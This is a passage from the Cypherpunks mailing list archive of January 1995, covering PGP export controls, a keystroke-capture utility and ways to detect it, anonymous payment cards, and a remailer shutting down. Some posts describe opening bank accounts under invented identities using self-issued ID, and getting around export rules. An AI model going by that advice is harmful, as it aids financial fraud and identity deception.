advance, Dave Hodgins. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwh0YJbACHtihSGlAQGxAwQAmCTfolPaXfyRIKWl+u8fzSrlLxv25GjB k/+50n11ErwRbJHRPsSAS8okZ9xq8CiVuCUiiOdFe3R7K3idCLVSVQeYWpBcy7ZO F1vUqcUrsqiar3IxUDAW0UAK5eIf/B5CIsN9TgYMxj7gd0r1UkSXjfgXq+PR9Iqf tMyBOICzwpU= =4FTc -----END PGP SIGNATURE----- **EZ-PGP v1.07 --- * RM 1.3 00820 * Internet:Dave.Hodgins at Canrem.com Rime->118 Fido(1:229/15) From abostick at netcom.com Mon Jan 2 14:53:46 1995 From: abostick at netcom.com (Alan Bostick) Date: Mon, 2 Jan 95 14:53:46 PST Subject: Exporting cryptographic materials, theory vs. practice In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article , you wrote: > Right now, I don't think U.S. Customs is going to ask you if you > have PGP in your PC if you leave the country, or return either. > > They should, and I'd be proud to say yes. And you can beam with pride as they impound your PC and take it away. Gosh. Sometimes it's just swell to be a cypherpunk. Kinda chokes me up. . . . Right now the situation is a sort of security-through-obscurity situation where they're not going to bother you for having PGP on your laptop's hard disk. Security through obscurity sucks, but the present situation is still better than the one where they know what to look for and what questions to ask, and you're headed for the slammer if you haven't gotten your temporary export license signed and stamped and ready to go. Do you want it to be easier to comply with bad law? | PROOF-READER, n: A malefactor who atones for Alan Bostick | making your writing nonsense by permitting abostick at netcom.com | the compositor to make it unintelligible. finger for PGP public key | Ambrose Bierce, THE DEVIL'S DICTIONARY Key fingerprint: | 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79 +legal_kludge=off -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQB1AgUBLwh5U+VevBgtmhnpAQGWywMAhEpmFRrQXJPRpF4mPqAHmaxcGpZm00z2 acEogITT4O+aT+qGOoAiUnlaRWXOLmkOle75dhoAiJOabzRJ09rwXfyZzVLna8Gd DI9fVCrIjodY3Xl6BLZfRjblmDIQT6LA =RzSg -----END PGP SIGNATURE----- From crawford at scruznet.com Mon Jan 2 15:37:03 1995 From: crawford at scruznet.com (Michael D. Crawford) Date: Mon, 2 Jan 95 15:37:03 PST Subject: Comments on Key Capture Survey Message-ID: <199501022337.PAA05279@scruz.net> I am the author of the Last Resort keystroke capture program for the Macintosh, published by Working Software, Inc.. I am writing up the surveys for LR for Mac, DOS and Windows and will send them shortly. I have a couple of comments, which the list might be interested in hearing. Your entries for the Macintosh should record the file type and creator code, which are, for Last Resort, 'cdev' and 'mIKE' respectively (case is significant). If someone were to write an automated scanner meant to protect a disk against such utilities, it would be much more reliable if it looked for the creator codes, as Mac programs are usually written to not depend on having a particular file name. These codes live in the file system, but are not part of the name space as '.EXE' would be on DOS. You can view them with ResEdit's "Get File/Folder Info" item from the File menu. We spent a lot of time pondering the problem of password theft. We decided that the benefit to the consumer of having this utility available to save data outweighed the obvious danger of password and text theft. The problem increases, though, if one is not aware that Last Resort is installed. The Read Me file on the distribution disks has a discussion of this problem (as well as the problem of people snarfing your files when you share your disk to the whole company or campus), and there is a way to disable key capture temporarily, for password entry. I'm not real happy with the ease one can sneak Last Resort onto someone's machine, but I take a little ironic solace in knowing that similar programs that are "more hidden" than LR are available in source code form from Phrack, at least for DOS. On the plus side, I have gotten many, many letters, e-mails and phone calls from people who say it saved their butts when a piece of critical information would have been lost. I had the habit of taking customer orders over the phone while in the middle of debugging a program (like Last Resort!) and would frequently crash before the order could be saved or printed. LR saved my company real money in this case. David Pogue's book _Hard Drive_ is based in part on Last Resort, in that a key capture utility is used to recover a password that saves the world. I was quite tickled by this. I'm sad to say, though, that I know of one case in which Last Resort precipitated the end of a relationship, in which a fellow discovered the love letters his girlfriend had e-mailed to someone else in his Last Resort files. This particular fellow was glad that he found out about it, but I still feel a twinge of guilt when I think about it. I certainly support any effort made to document the existence of these programs. I might suggest that one way to defend against them would be to watch for the patching of certain system calls - patching GetNextEvent or installing a jGNEFilter on the Mac, and warning the user if this happens. It's easy to detect such patching; for the most part it will be innocent, but a hacker who had a fair amount of Mac programming knowledge could make a keystroke capture program in an evening of work, so attempting to catalog them all will provide only moderate protection against them. BTW... most of those other commercial keystroke capture programs (no names here) are clones of Last Resort. Some of them even had the gall to use our logo in their advertising (in a claim they were better than us). LR might not do as much as some of them, but I know that it is more reliable than the competitors I have tested. So if you are going to actually _use_ a key capture program for your own (legitimate!) use, consider getting The Real Thing, the One True Key Capture Program, the Saviour of Data: Last Resort. I don't work for WSI any more, but we remain friends, and they can be reached at: Working Software, Inc. PO Box 1844 Santa Cruz, CA 95061-1844 (408) 423-5696 (800) 229-9675 (408) 423-5699 FAX working at scruznet.com 76004.2072 at compuserve.com Cheers, Michael D. Crawford crawford at scruznet.com <- Please note change of address. crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key. From jamesd at netcom.com Mon Jan 2 18:39:55 1995 From: jamesd at netcom.com (James A. Donald) Date: Mon, 2 Jan 95 18:39:55 PST Subject: Exporting cryptographic materials, theory vs. practice In-Reply-To: Message-ID: On Mon, 2 Jan 1995, Carol Anne Braddock wrote: > Right now, I don't think U.S. Customs is going to ask you if you > have PGP in your PC if you leave the country, or return either. > > They should, and I'd be proud to say yes. Well Carol, I am sure your heart is in the right place, but I do not agree. They should not, and I'd be deranged to say yes. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jamesd at netcom.com Mon Jan 2 18:57:12 1995 From: jamesd at netcom.com (James A. Donald) Date: Mon, 2 Jan 95 18:57:12 PST Subject: Exporting cryptographic materials, theory vs. practice In-Reply-To: <199501021725.AA09061@bolero.rahul.net> Message-ID: On Mon, 2 Jan 1995 nobody at rahul.net wrote: > Doesn't Matt's experience really show simply that not enough people try > to follow the rules, [...] > > [...] > > I could see a system where you routinely fill out and have your card > stamped when you check your luggage to show that you are carrying crypto. > Then you turn it in when you come back. [...] How does this > advance the CP cause? Exactly so. Surely we are better off with a system that does not work. Furthermore, with the current system, entropy works in our favor. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From yusuf921 at uidaho.edu Mon Jan 2 21:36:57 1995 From: yusuf921 at uidaho.edu (Syed Yusuf) Date: Mon, 2 Jan 95 21:36:57 PST Subject: Appolgy to P. Zimmerman Message-ID: Mr. Zimmerman, I would like to take this opertunity to publicaly appologize to Mr Zimmerman (the primary author of PGP). In a post to the internet I criticized Mr. Zimmerman for takeing a short route to legalize PGP short term rather then directly attack Public Key Partners so-called patent of public encryption. I would like appologize, as I have now been presented with the opertunity for a business venture requiring encryption of data I realize that we don't all have the legal resourses to be maveriks and challenge patents. Some of us need encryption now and it's only a matter of time before PKP's patents fall. --Syed Yusuf From rogaski at phobos.lib.iup.edu Tue Jan 3 00:19:29 1995 From: rogaski at phobos.lib.iup.edu (Mark Rogaski) Date: Tue, 3 Jan 95 00:19:29 PST Subject: HACK - EFH Presents Free PGP Encryption Workshop (fwd) Message-ID: <199501030819.DAA29763@phobos.lib.iup.edu> -----BEGIN PGP SIGNED MESSAGE----- Just thought you may be interested in this. Anybody ever hear of this EFH group? It's nice to see somebody making PGP a little easier for the average jane/joe end-user-type to use. - From the node of FringeWare Daily: : : Sent from: Jon Lebkowsky @io.com : : >From: robbiew at inviso.com : >Summary: January 14, 3:00 PM, SCCSI offices in Houston : >Keywords: Houston EFH PGP Workshop : : Electronic Frontiers Houston : presents a : Free Cryptography Workshop: : How to use Pretty Good Privacy : (PGP) : presented by Paul Elliott : 14 January 1995 3PM : : : It has become apparent that the data super highway is not safe. Messages : traveling the data highway can be hijacked by sinister data interlopers. : : After six months of unpaid labor, in June, 1991 Philip Zimmermann : released his controversial freeware program Pretty Good Privacy (PGP). : Just as Prometheus' liver was eternally chewed by eagles for the crime : of bringing fire to mankind, Philip Zimmermann's liver is now being : chewed by the Federal Eagle (The U.S. Custom Service) for the alleged : crime of releasing strong cryptography to the world. : : As a result of Philip Zimmermann's contribution, you can use the widely : available freeware program PGP to send electronic-mail messages to : anyone in the world, in complete privacy! In addition you can send : authentication with your messages so that the recipient can verify that : the message really came from you. You can encrypt sensitive files on : your computer so that the files remain private even if your computer and : disks are stolen. : : In this free workshop, our presenter Paul Elliott will show you how you : can use PGP effectively, easily, and intelligently. PGP is available for : most popular computers and Operating Systems, including MSDOS, UNIX, MAC : and OS/2 among many others. : : The Workshop will take place at on January 14, at 3:00 PM at the : offices of South Coast Computing located at 1811 Bering, Suite 100. Park : in the garage, and ignore the "contract only" sign. Enter through the : back door (adjacent to the garage) and use the house phone (dial 100) if : the door is locked. : : : | Augusta | Bering | Chimney Rock | 610 Loop West ^ : | | | | | : | | | | N : ----+-----------+-----------+----------------+---- San Felipe : | |* SCCSI | | : | | | | : ----+-----------+-----------+----------------+---- Westheimer : | | | | : | | | | : ----+-----------+-----------+----------------+---- 59 South (SW Fwy) : | | | | : | | | | : : : For more information call (713)799-1044 or : email efh at blkbox.com : : -- : Robbie Westmoreland robbiew at inviso.com : Electronic Frontiers Houston announcement : : : : : : -- : =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= : Jon Lebkowsky FringeWare, Inc. jonl at fringeware.com : URL http://fringeware.com/staff/jonl/jonl.html voxmail 512-444-2693 : =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= : : : : : - ----- Mark Rogaski a.k.a. Doc "I used to think that my brain was the rogaski at phobos.lib.iup.edu best part of my body ... but then I http://www.lib.iup.edu/~rogaski/ remembered who was telling me this." 100,000 lemmings can't be wrong! - Emo Phillips >>>>>finger fllevta at oak.grove.iup.edu for PGP Public Key and Geek Code v2.1<<<<< Disclaimer: You would probably be hard-pressed to find ANYONE who agrees with me, much less my university or employer... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwkIix0c4/pqJauBAQGBpAQArkyQpzJi4ux+gDGrHAmbFMvifVkRYFfG KpkFcPC+h8eGZy3/bbGsKuev7ZXICUBKpf7KIPtg7P4vaD3hPyjRVZahu5doIWiY 9k//PkA0ViMq3p/bT0dfDcMavBVUppHNs4g8FxV0njqXinIT1PI42PRfroGSwL7m FqtECicCS3Y= =QD7G -----END PGP SIGNATURE----- From rah at shipwright.com Tue Jan 3 05:18:10 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 3 Jan 95 05:18:10 PST Subject: Anonymous payment scheme Message-ID: At 1:21 PM 1/2/95, Hal wrote: >I'm not sure what you do in this situation if they ask to see some ID >when you try to use the card. This would be rather embarrassing, it >seems to me. Sorry, I guess I left my drivers license in my other >pants... Or, never mind, try this card. That other one was from before I >changed my name... Why not, "It's a pseudonym."? Looks like an evangelistic opportunity to me. Pseudonyms can't be illegal, or Mark Twain and Bob Dylan would have written from prison. ;-). I also don't believe that you are legally required to produce ID for a credit card purchase. That was the point about those pictures on the front of Citibank cards. Citicorp did that to get around the legal restrictions on demanding ID to cope with the much larger issue of fraud. Most (smaller) vendors hardly check the signature on the back, much less validating it against a state ID, however. Hmmm. What if you produced a pseudonym card *with* your picture on the front? I smell a market opportunity. Or not... >And personally, I am more concerned about the >bank and gov't tracking my spending patterns than whether the guy I buy >gas from knowing my name. The bank has a lot more information about me >which is much more threatening to my privacy. A nom de guerre VISA or >debit card does not seem to help this problem. Indeed. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From bmorris at netcom.com Tue Jan 3 07:42:27 1995 From: bmorris at netcom.com (Bob MorrisG) Date: Tue, 3 Jan 95 07:42:27 PST Subject: Anonymous payment scheme In-Reply-To: <199501022121.NAA07411@jobe.shell.portal.com> Message-ID: <199501031542.HAA11629@netcom11.netcom.com> HH> So, you may be able to have a form of anonymity from the person you ar HH> transacting with, but I don't think you can be anonymous from the bank HH> and from the government. And personally, I am more concerned about th With a debit card you can't be anonymous, because your money resides in the bank. With digital cash, and the ability to transfer money to another digital cash card via phone lines, I don't see how they can successfully trace everything. They will try, no doubt. From blane at seanet.com Tue Jan 3 08:15:04 1995 From: blane at seanet.com (Brian Lane) Date: Tue, 3 Jan 95 08:15:04 PST Subject: Anonymous payment scheme In-Reply-To: <199501031542.HAA11629@netcom11.netcom.com> Message-ID: On Tue, 3 Jan 1995, Bob MorrisG wrote: > HH> So, you may be able to have a form of anonymity from the person you ar > HH> transacting with, but I don't think you can be anonymous from the bank > HH> and from the government. And personally, I am more concerned about th > > With a debit card you can't be anonymous, because your money resides in > the bank. With digital cash, and the ability to transfer money to > another digital cash card via phone lines, I don't see how they can > successfully trace everything. They will try, no doubt. I don't see why a debit card couldn't be anonymous, even to the point of having no name, AND no picture on it. Yes, the bank has the money, but their only obligation is to dish it out to the vendors/ATMs that you have used your card with. Why should a bank care who you are once they have your money in the account. As to avoiding fraud with the card, is it really that huge of a problem? As long as noone copies the number(could go so far as no embossed number. Just a gloss black card with a hologram of a Bald Eagle on the front of it), and you don't lose the card how can someone use your account? I think that this anonymous debit card would be a good first step towards anonymous digital cash. You still couldn't exchange digital cash with your buddy in Taiwain, but it would work for converting to physical cash(Which I still like, and is the best anonymous cash around right now). Anyone here adept enough at finance to write a proposal for CitiCorp? :> How would they make their mony off the cards? Annual fees, and vendor percentages I guess? Brian ------------------------------------------------------------------------------ "Everyone is a prisoner holding their own key." | finger blane at seanet.com -- Journey | PGP 2.6 email accepted ------------------------------------------------------------------------------ From frissell at panix.com Tue Jan 3 08:34:26 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 3 Jan 95 08:34:26 PST Subject: Anonymous payment scheme Message-ID: <199501031634.AA16432@panix.com> At 07:42 AM 1/3/95 -0800, bmorris at netcom.com wrote: >With a debit card you can't be anonymous, because your money resides in >the bank. With digital cash, and the ability to transfer money to >another digital cash card via phone lines, I don't see how they can >successfully trace everything. They will try, no doubt. Unless you open a bank account in a nome de guerre. In the Inter-mountain West and in small towns elsewhere, it is often possible even today to open a bank account with "soft ID." Such ID would include employment ID and student ID. Since anyone can be an employer or a school, anyone can issue such soft ID. These items work very well if backed up with a secured VISA card from one of the many issuers. Some of the issuers of secure credit cards want references but many will issue their cards if your name comes up as having no credit record. Made up people are the most likely to have no credit history. Even though a VISA card is not meant to be ID, most people (even state DMV offices) treat it as ID. DCF ************************************************************************* ATMs, Contracting Out, Digital Switching, Downsizing, EDI, Fax, Fedex, Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone Cards, Quants, Securitization, Temping, Voice Mail. From perry at jpunix.com Tue Jan 3 06:53:51 1995 From: perry at jpunix.com (John A. Perry) Date: Tue, 03 Jan 1995 08:53:51 -0600 Subject: retiring my remailer.. Message-ID: <199501031453.IAA02344@jpunix.com> The anonymous remailer at jpunix.com is going to shut down permanently shortly after I send this message. I spent my holidays fighting spams, running out of disk space because of spams and people sending HUGE binaries, and running out of swap space. I have come to the ultimate conclusion that the Internet is not mature or developed enough for remailers. The intended purpose has been completely ignored while abuse is growing almost geometrically on a daily basis. I have concluded that running a remailer on the Internet is like giving a bunch of terrorists a nuclear bomb and then telling them "But only use it for good!". There just doesn't seem to be much point in thrashing my disks and computer to aid somebody in net abuse. I hardly ever (never) see any use of the remailer for the purposes it was intended. BTW as I type this, mailgate.mail.aol.com is hammering my port 25 every 30 seconds. The contents of the spam being passed thru my system essentially says: THIS IS A MAIL BOMB!! **** BOOM *** See what I mean?? John A. Perry - KG5RG - perry at jpunix.com WWW - http://jpunix.com PGP 2.62 key for perry at jpunix.com is on the keyservers. PGP-encrypted e-mail welcome! Finger kserver at jpunix.com for PGP keyserver help. Finger remailer at jpunix.com for remailer help. From db at Tadpole.COM Tue Jan 3 09:16:13 1995 From: db at Tadpole.COM (Doug Barnes) Date: Tue, 3 Jan 95 09:16:13 PST Subject: HACK - EFH Presents Free PGP Encryption Workshop (fwd) In-Reply-To: <199501030819.DAA29763@phobos.lib.iup.edu> Message-ID: <9501031715.AA08257@tadpole.tadpole.com> > > Just thought you may be interested in this. > Anybody ever hear of this EFH group? It's nice to see somebody making > PGP a little easier for the average jane/joe end-user-type to use. > Yes, many of the EFH founders have participated in EFF-Austin events. Steve Ryan, one of the EFH founders, spoke last week at HoHoCon (as did myself, Jim McCoy and Jeremy Porter.) I think the program is an excellent idea, and will be getting feedback from attendees with an eye to doing something similar here at some point. Doug From SADLER_C at HOSP.STANFORD.EDU Tue Jan 3 09:30:30 1995 From: SADLER_C at HOSP.STANFORD.EDU (Connie Sadler) Date: Tue, 3 Jan 95 09:30:30 PST Subject: EFF PGP Workshop Message-ID: <01HLEL9APM96000ONS@MR.STANFORD.EDU> Sure would be nice to have a PGP workshop in the Bay Area - any EFF members or others willing? Connie From hfinney at shell.portal.com Tue Jan 3 09:44:37 1995 From: hfinney at shell.portal.com (Hal) Date: Tue, 3 Jan 95 09:44:37 PST Subject: Anonymous payment scheme Message-ID: <199501031745.JAA09281@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- From: Brian Lane > I don't see why a debit card couldn't be anonymous, even to the point > of having no name, AND no picture on it. Yes, the bank has the money, but > their only obligation is to dish it out to the vendors/ATMs that you have > used your card with. Why should a bank care who you are once they have > your money in the account. Again, it is unclear here whether you are proposing that you would be anonymous to the bank or just have a blank card. As I wrote, banks are required to get SS#'s for depositers right now, and I wouldn't expect that to change any time soon. If anything, the trend appears to be towards more tightening rather than less. Duncan and/or Sandy have suggested giving a fake SS# when you open your secured account; maybe that would be legal but it sounds questionable to me. > As to avoiding fraud with the card, is it really that huge of a > problem? As long as noone copies the number(could go so far as no > embossed number. Just a gloss black card with a hologram of a Bald Eagle > on the front of it), and you don't lose the card how can someone use your > account? I used my VISA yesterday, and after swiping it through the now-ubiquitous card readers the vendor was required by the machine to manually enter the last four digits on the card. He complained that this was something new and was happening very frequently now (maybe a change with 1995?). I have heard of fraud where people make fake VISA cards (or steal them) and re-program the mag stripe to have a different number than what is on the front. Maybe this is a countermeasure for that. It doesn't sound like a blank card is the direction the industry is going. Does anyone have more info on this change? Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLwmNFBnMLJtOy9MBAQF4gAH7BgHuNzraGdAujkbnStXf9knBUYCKiJZv zodiYtbEFAKuuPUIT/aqyM1L7IPRbMuNMSW9hmel3k11g9ATHy+doA== =n71e -----END PGP SIGNATURE----- From jamesd at netcom.com Tue Jan 3 09:51:56 1995 From: jamesd at netcom.com (James A. Donald) Date: Tue, 3 Jan 95 09:51:56 PST Subject: Press attack on anonymity. Message-ID: Yesterday an "opinion" article appeared in the SF Chronicle, written by some unimportant person who knew absolutely nothing about the internet. Today a similar, but better informed article, appeared in many newspapers, originating from the New York Times. Articles written for newspapers are written to survive arbitrary truncation, hence key points first, lesser points later. The interesting thing is that the two articles, despite different authors, had equivalent key points, implying that some single higher authority gave out a list of points to be made, but left the headline and overall spin to the columnist. Indeed, when one reads beyond the key points that were equivalent in both articles, it is as if one suddenly encounters a different journalist. There is an abrupt change of tone and style when one reads from the uniform part to lesser points. The key points in both articles are that the government should do something coercive to stop anonymity on the internet, and that there is widespread support for such a move. Note that since both articles are obviously tentacles, there is a mysterious and anonymous powerful person -- the single higher authority of which I spoke earlier -- who is anonymously attacking anonymity. In my opinion when a mysterious anonymous and powerful voice proclaims that the government should coerce someone, it is usually the government speaking -- a government department with guns is running up a trial balloon. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jya at pipeline.com Tue Jan 3 09:55:13 1995 From: jya at pipeline.com (John Young) Date: Tue, 3 Jan 95 09:55:13 PST Subject: NYT on MEMS Message-ID: <199501031755.MAA07431@pipe1.pipeline.com> Malcolm Browne has longish article today on MEMS and current mathematical and engineering research on their use to control turbulence -- in planes, ships, submarines, blood, water, flatulence. For email copy send blank message with subject: MEM_tug From danisch at ira.uka.de Tue Jan 3 10:08:20 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Tue, 3 Jan 95 10:08:20 PST Subject: Phil's Plight Message-ID: <9501031808.AA21529@elysion.iaks.ira.uka.de> > I think Phil deserves better than the > silence his plight has received as of late. True. But would it be good or bad help if something other than silence came from outside the USA? I mean if the rest of the world says they love him, the attorney will say "yes, of course. Therefore he gets sued." :-( Hadmut From cactus at seabsd.hks.net Tue Jan 3 10:08:25 1995 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Tue, 3 Jan 95 10:08:25 PST Subject: GUI: PGP vs novices Message-ID: <199501031814.NAA24428@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- In article , Dave Del Torto wrote: >The Cypherpunks should really launch a new list oriented toward novices >with basic questions. It could be a Web page with a question form, or even >an email address for the Web-challenged (I may do it, but I welcome any >offers to help). As an incentive to Cypherpunks, their friends and >colleagues and members of the general public, I'm hereby offering to spend >some time answering questions for novice users at either: > > or > . I attempted to set something like this up about 7 months ago. I got so little interest that I never set up the mailing list. Better than a single person's address, I'd suggest a pgp-help mailing list for all interested folks, just as the flexfax list works for flexfax users and commercial products have their own lists. I just set up a list on pgp-help at hks.net, and I'll place pgp-questions at lsd.com on the list (assuming you won't object). Anybody else who's interested, send me mail at pgp-help-request at hks.net. I don't have the list of folks who volunteered last time, so this'll be fresh. - - -- Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather cactus at hks.net | scornful tone, 'it means just what I choose it to mean - cactus at bb.com | neither more nor less.'" - Lewis Carroll - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwlY4hNhgovrPB7dAQEBvQQA1vxwGcYZ28qlytX3jrY95WN/L11X1FG2 MGwWjjk8BZ2cXk1uvLWtuhoNGwzqhup/aGLVGuPo2QjFPiqwjoA5pa+9+8093dpl tBMziDmJ5/Pg3jWirRiuuREa5Ki977I/uplp3Ysh0ioz07Ws44susZrcdDHbIChL TYKrC1DROi4= =GbTI - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLwmT2yoZzwIn1bdtAQFvxwGAgkaHPEh2A7NuPXJgtNBNqV4j9KrnLbex az8jQmFpTfBaAbLPfP5i7tdVPjJ21xom =yR+4 -----END PGP SIGNATURE----- From danisch at ira.uka.de Tue Jan 3 10:10:03 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Tue, 3 Jan 95 10:10:03 PST Subject: Why I have a 512 bit PGP key Message-ID: <9501031809.AA21532@elysion.iaks.ira.uka.de> > A compiler can recognize one specific piece of code or a few > specific peices of code and do something perverse. It cannot > recognize functionally equivalent code, this > being a high order artificial intelligence problem. It's enough to recognize DES tables or PGP procedures. Hadmut From sandfort at crl.com Tue Jan 3 10:11:53 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Tue, 3 Jan 95 10:11:53 PST Subject: Anonymous payment scheme In-Reply-To: <199501022121.NAA07411@jobe.shell.portal.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Mon, 2 Jan 1995, Hal wrote: > . . . > There are a couple of issues here. One is whether you could get a > debit card with another name printed on it than your own. Sandy > Sandfort and some others have suggested here that this would be legal > and possible already as long as you don't do it with the intention to > commit fraud. You can open a secured account by mail and give a false > name. > Opening an account in the US without ID is very difficult > I'm not sure what you do in this situation if they ask to see some ID > when you try to use the card. This would be rather embarrassing, it > seems to me. Sorry, I guess I left my drivers license in my other > pants... Or, never mind, try this card. That other one was from before I > changed my name... > > The other issue is whether you could set up a payment system which did > not require social security numbers from the participants. I think > this is much more questionable. Although the phone cards and some > other restricted usage systems are apparently legal, bank accounts seem > to have many more restrictions. Barter and scrip systems are also > heavily regulated. All these laws involving reporting requirements, > etc., were passed to help the government track the flow of money. > There is no way the government is going to make an exception at this > point. In fact, I suspect that if the limited systems expanded to > where they were used for general payments, the government would crack > down. I recall reading that just such a crackdown occured in Las Vegas > when casino chips started to be accepted for non-gambling payments. > > So, you may be able to have a form of anonymity from the person you are > transacting with, but I don't think you can be anonymous from the bank > and from the government. And personally, I am more concerned about the > bank and gov't tracking my spending patterns than whether the guy I buy > gas from knowing my name. The bank has a lot more information about me > which is much more threatening to my privacy. A nom de guerre VISA or > debit card does not seem to help this problem. > > Hal > > -----BEGIN PGP SIGNATURE----- > Version: 2.6 > > iQBVAwUBLwhuNRnMLJtOy9MBAQEkPQIAqEEglLxt8E4Rrgh7dR93fuCSJUI+UMgF > 3XUrsTxM4whOejFMrluOAYM+2RdBOgYTk1mNEiAgSUPLLScIa9zU5A== > =CF5G > -----END PGP SIGNATURE----- > From danisch at ira.uka.de Tue Jan 3 10:20:27 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Tue, 3 Jan 95 10:20:27 PST Subject: Why I have a 512 bit PGP key Message-ID: <9501031819.AA21541@elysion.iaks.ira.uka.de> > While it's likely that a sysadmin could hack the kernel to substitute > bogus MD5 hashes, doing so in certain environments could earn the sysadmin a > quick exit from employment. If it wasn't the reason he was employed for. In Germany it is not allowed to spy out someone elses phone calls. (Is it in the USA?) But some cases got public where employees of several companys got their phones tapped. It was done to find out whether they do private phone calls or what they say in private phone calls. Hadmut From sandfort at crl.com Tue Jan 3 10:20:33 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Tue, 3 Jan 95 10:20:33 PST Subject: Exporting cryptographic materials, theory vs. practice In-Reply-To: Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Mon, 2 Jan 1995, Alan Bostick wrote: > . . . > > Right now, I don't think U.S. Customs is going to ask you if you > > have PGP in your PC if you leave the country, or return either. > > > > They should, and I'd be proud to say yes. > > And you can beam with pride as they impound your PC and take it away. > Gosh. Sometimes it's just swell to be a cypherpunk. Kinda chokes me > up. . . . No reason to risk a hassle by exporting PGP from the US on your laptop, it's everywhere. Just take your Secret Keyring file and download PGP from a foreign FTP site once you are out of the US. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From danisch at ira.uka.de Tue Jan 3 10:34:08 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Tue, 3 Jan 95 10:34:08 PST Subject: Stegno for Kids Message-ID: <9501031834.AA21554@elysion.iaks.ira.uka.de> > and Crayola brand > secret writing pens (WOW!!!!). There are about 8 pens in the set. You write > secretly with two of them and develop the image with the other six. I had something like that as a toy about 20 years ago. A single pen with tips on both sides. One to write, the other to develop. Didn't they have it in America also? Hadmut From danisch at ira.uka.de Tue Jan 3 10:38:49 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Tue, 3 Jan 95 10:38:49 PST Subject: Exporting cryptographic materials, theory vs. practice Message-ID: <9501031838.AA21557@elysion.iaks.ira.uka.de> What do I have to do if I want to bring cryptographic equipment _into_ the USA temporary (for use or demo) and want to take it back home after some days or weeks. Since I am in America then I am under american law. The _export_ of my own crypto stuff is not temporary. Does the american law allow me (a foreigner!) to take out any cryptographic material, even if it is my own thing? Hadmut From frissell at panix.com Tue Jan 3 10:47:10 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 3 Jan 95 10:47:10 PST Subject: Press attack on anonymity. Message-ID: <199501031847.AA16557@panix.com> At 09:51 AM 1/3/95 -0800, James A. Donald wrote: >Yesterday an "opinion" article appeared in the SF Chronicle, >written by some unimportant person who knew absolutely >nothing about the internet. > >Today a similar, but better informed article, appeared in >many newspapers, originating from the New York Times. The later is presumably Peter Lewis' article on anonymity on the nets that appeared in the Saturday Times. It was not that negative about anonymity although it did seem to confuse spoofing with anonymity (since it talked about digital signatures as a response to "problems"). He did not advocate government intervention. Since the Supremes have always supported anonymous speech, it seems unlikely that anonymity could be outlawed. Things like mandatory identification for net access (hard to enforce worldwide) would also seem to be a "government license for publication" which is what the 1st Amendment was specifically written to stop. In any case, using companies as cutouts for such activities is trivial. Mandatory ID of any sort only goes back as far as the first entity which can be a company formed to block tracing. DCF ************************************************************************* ATMs, Contracting Out, Digital Switching, Downsizing, EDI, Fax, Fedex, Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone Cards, Quants, Securitization, Temping, Voice Mail. From foo.bar at baz.quux.com Tue Jan 3 10:54:25 1995 From: foo.bar at baz.quux.com (An annoyed user) Date: Tue, 3 Jan 95 10:54:25 PST Subject: Anon penet addresses Message-ID: <9501031851.AA27170@toad.com> To whomever keeps signing up penet addresses of the form "anXXXX" to cypherpunks: Cut it out. I've changed your address from the anXXXX to the naXXXX address. If you don't know why anXXXX is antisocial, I can tell you while flaming you for not understanding what you['re doing. From sandfort at crl.com Tue Jan 3 10:57:36 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Tue, 3 Jan 95 10:57:36 PST Subject: SAN FRANCISCO EDITORIAL 